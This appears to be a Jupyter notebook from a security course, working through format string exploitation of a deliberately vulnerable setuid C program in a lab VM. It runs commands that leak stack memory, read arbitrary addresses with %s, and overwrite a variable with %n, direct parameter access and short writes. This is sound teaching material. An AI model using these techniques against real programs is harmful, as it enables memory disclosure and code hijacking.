# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- hello.c program uses `printf()` incorrectly!
- "Hello World\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [15]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-rw-r-- 1 seed seed 78 Aug  8 18:47 hello.c


In [18]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

In [16]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [17]:
! hello.exe

Hello World!


## The Format String Vulnerability
- using `printf(string)` instead of `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

- print four repeating bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - these are the arguments for format string stored in higher memory addresses

In [48]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);

   exit(0);
}


In [None]:
! ./compile.sh fmt_vuln.c fmt_vuln.exe

In [33]:
# dees is password for sudo user
! echo dees | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for seed: 

In [34]:
# check ownership of the fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [35]:
! echo dees | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for seed: 

In [36]:
! ls -al fmt_vuln.exe

-rwsrwxr-x 1 root root 8596 Aug  8 18:54 fmt_vuln.exe


In [38]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [39]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [43]:
# what if you provide %s as value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingbfffe840
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [44]:
! ./fmt_vuln.exe testing%s
# notice testing repeats twice!

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [46]:
# process can be used repeatedly to examine stack memory
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
bfffe780.00000000.b7fff858.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [49]:
! fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:
Segmentation fault


In [57]:
# bunch of 2e78383025 are repeated
# each four bytes values are reversed due to little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
```bash
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%08x
$ ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s # get segfault
```
- if a valid memory address is used, this process could be used to read a string found at that memory address
```bash
$ env | grep $PATH
```
- compile and run booksrc/getenvaddr.c
```bash
$ ./compile.sh getenvaddr.c getenvaddr
$ ./getenvaddr PATH ./fmt_vuln.exe
```
- use the path address to provide the value for %s
```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x.%08x.%08x.%s
```

In [60]:
! ./fmt_vuln.exe AAAA.%08x.%08x.%08x.%08x
# notice that fourth parameter is repeating from begnning of the format string 
# AAAA to gets its data

The right way to print user-controlled input:
AAAA.%08x.%08x.%08x.%08x
The wrong way to print user-controlled input:
AAAA.bfffe830.00000000.b7fff858.41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [62]:
! ./fmt_vuln.exe AAAA%08x.%08x.%08x.%s
# why do we get segfault?

The right way to print user-controlled input:
AAAA%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
Segmentation fault


In [63]:
# how about we provide some valid memory address in memory AAAA
! env | grep $PATH

PATH=/usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin


In [64]:
# compile and run getevnaddr.c to find the memory address of env variables respective to programs
! cp ./booksrc/getenvaddr.c .

In [65]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [66]:
! ./compile.sh getenvaddr.c getenvaddr.exe

In [68]:
! ./getenvaddr.exe PATH ./fmt_vuln.exe

PATH will be at 0xbffff3a0


In [89]:
# lets try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(perl -e 'print "\xa0\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858.sr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [79]:
! printf "%x" $((0xa0-2))

9e

In [88]:
! ./fmt_vuln.exe $(perl -e 'print "\x9e\xf3\xff\xbf"')%08x.%08x.%08x.%s

The right way to print user-controlled input:
����%08x.%08x.%08x.%s
The wrong way to print user-controlled input:
����bfffe830.00000000.b7fff858./usr/local/bin:/home/seed/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:.:/snap/bin:/usr/lib/jvm/java-8-oracle/bin:/usr/lib/jvm/java-8-oracle/db/bin:/usr/lib/jvm/java-8-oracle/jre/bin:/home/seed/android/android-sdk-linux/tools:/home/seed/android/android-sdk-linux/platform-tools:/home/seed/android/android-ndk/android-ndk-r8d:/home/seed/.local/bin
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Writing to Arbitrary Memory Addresses
- `%n` format parameter can be used to write to arbitrary memory address
- `test_val` variable has been printing its address and value in the debug statement
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%08x.%08x.%08x.%n
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%100x%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")%x%x%400x%n
```

In [85]:
! fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [87]:
# test_val is @ 0x0804a02c
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%08x.%08x.%08x.%n

The right way to print user-controlled input:
,�%08x.%08x.%08x.%n
The wrong way to print user-controlled input:
,�bfffe830.00000000.b7fff858.
[*] test_val @ 0x0804a02c = 31 0x0000001f


In [86]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%x.%n

The right way to print user-controlled input:
,�%x.%x.%x.%n
The wrong way to print user-controlled input:
,�bfffe840.0.b7fff858.
[*] test_val @ 0x0804a02c = 24 0x00000018


In [90]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%100x.%n

The right way to print user-controlled input:
,�%x.%x.%100x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                            b7fff858.
[*] test_val @ 0x0804a02c = 116 0x00000074


In [91]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x.%x.%200x.%n

The right way to print user-controlled input:
,�%x.%x.%200x.%n
The wrong way to print user-controlled input:
,�bfffe830.0.                                                                                                                                                                                                b7fff858.
[*] test_val @ 0x0804a02c = 216 0x000000d8


## Writing User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- 0xAA -> 0x0804a02c
- 0xBB -> 0x0804a02d
- 0xCC -> 0x0804a02e
- 0xDD -> 0x0804a02f
```bash

$ printf "%d\n" $((0xaa - 28 + 8)) # 150
or
$ echo $((0xaa - 28 + 8))
$ ./fmt_vuln.exe $(printf "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08")%x%x%8x%n #52
$ echo $((0xaa-52+8)) #126
```

In [95]:
# findout the width value for 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�%x%x%8x%n
The wrong way to print user-controlled input:
,�bfffe8400b7fff858
[*] test_val @ 0x0804a02c = 21 0x00000015


In [98]:
# 0xaa is final value - 21 is what width 8 provides
!echo $(( 0xaa - 21 + 8))

157


In [97]:
# replace width 8 with 157
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%157x%n
# text_val = 0x000000aa

The right way to print user-controlled input:
,�%x%x%157x%n
The wrong way to print user-controlled input:
,�bfffe8400                                                                                                                                                     b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [99]:
# next write 0xbb, 0xcc, and 0xdd
# need more %x%n format to write to each addresses
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200b7fff858
[*] test_val @ 0x0804a02c = 45 0x0000002d


In [100]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-45+8 ))

133


In [101]:
# replace with 8 with 133 to write
# force to write 0xaa
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858
[*] test_val @ 0x0804a02c = 170 0x000000aa


In [102]:
! echo $(( 0xbb - 0xaa ))

17


In [103]:
# now write 0xbb in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8200                                                                                                                             b7fff858         4b4e554a
[*] test_val @ 0x0804a02c = 48042 0x0000bbaa


In [104]:
! echo $(( 0xcc - 0xbb ))

17


In [105]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = 13417386 0x00ccbbaa


In [None]:
# finally write 0xdd

In [106]:
! echo $(( 0xdd - 0xcc ))

17


In [107]:
# now write 0xcc in correct address
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08JUNK\x2d\xa0\x04\x08JUNK\x2e\xa0\x04\x08JUNK\x2f\xa0\x04\x08"')%x%x%133x%n%17x%n%17x%n%17x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�%x%x%133x%n%17x%n%17x%n%17x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�bfffe8100                                                                                                                             b7fff858         4b4e554a         4b4e554a         4b4e554a
[*] test_val @ 0x0804a02c = -573785174 0xddccbbaa


## Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using the dollar sign qualifier
    - e.g., `%n$d` would access the nth parameter and display it as a decimal number

In [1]:
#include <stdio.h>
int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
}

/tmp/tmpga_vbkob.c: In function ‘main’:
     printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
            ^


7th: 70, 4th: 00040


In [1]:
# lets use direct parameter access with fmt_vuln.exe
! ./fmt_vuln.exe AAAA%x%x%x%x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAbfffe8400b7fff85841414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


In [3]:
# access the fourth argument (beginning of the format string)
# $ sign is special character so must be escaped
! ./fmt_vuln.exe AAAA%4\$x

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804a02c = -72 0xffffffb8


## Using Short Writes
- a `short` is typically a two-byte word using `h`
- helps write an entire four-byte value with just two `%hn` parameters 

In [6]:
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xa0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�bfffe8400b7fff858
[*] test_val @ 0x0804a02c = -65515 0xffff0015


In [8]:
! ./fmt_vuln.exe $(perl -e 'print "\x2e\xa0\x04\x08"')%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804a02c = 327608 0x0004ffb8
